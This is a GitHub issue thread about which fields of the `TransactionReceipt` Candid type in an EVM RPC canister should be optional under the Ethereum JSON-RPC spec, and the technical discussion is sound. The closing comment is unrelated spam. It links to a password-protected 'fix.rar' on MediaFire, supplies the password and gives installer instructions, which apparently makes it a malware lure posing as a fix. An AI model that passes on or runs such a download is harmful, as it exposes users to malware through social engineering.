### ISSUE TITLE
Various fields in `TransactionReceipt` should be optional

### ISSUE THREAD

**Issue by gregorydemay** [internet-computer-protocol/evm-rpc-canister#262]
According to the [Ethereum JSON-RPC specification](https://github.com/ethereum/execution-apis/blob/b7432c54d2faa5f282db7b3202c3c2ef907103ad/src/schemas/receipt.yaml#L40) _only_ the following fields in a `TransactionReceipt` record are required:

1. `blockHash`
2. `blockNumber`
3. `from`
4. `cumulativeGasUsed`
5. `gasUsed`
6. `logs`
7. `logsBloom`
8. `transactionHash`
9. `transactionIndex`
10. `effectiveGasPrice`

This means that the following fields in the current Candid [definition](https://github.com/internet-computer-protocol/evm-rpc-canister/blob/release-2024-05-23/candid/evm_rpc.did#L218) of a `TransactionReceipt` are wrongly declared mandatory and should be made optional:

1. `to` (e.g., null for contract creation such has in this transaction `0x2b8e12d42a187ace19c64b47fae0955def8859bf966c345102c6d3a52f28308b`)
2. `status` (null for transactions before the Byzantium upgrade, e.g. `0x5a9d77909e77eee0a768d4160155c60fa77ae5b621e3c6f4fe6c54f509ea8c33`)

Although `type` is not mandatory according to the specification, it was introduced in a backwards-compatible way by [EIP-2718](https://eips.ethereum.org/EIPS/eip-2718) in the [Berlin fork](https://blog.ethereum.org/2021/03/08/ethereum-berlin-upgrade-announcement), so that even the first ever Ethereum transaction `0x5c504ed432cb51138bcf09aa5e8a410dd4a1e204ef84bfed1be16dfba1b22060` (which predates the Berlin fork) also has a `type` returned when its receipt is queried.

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
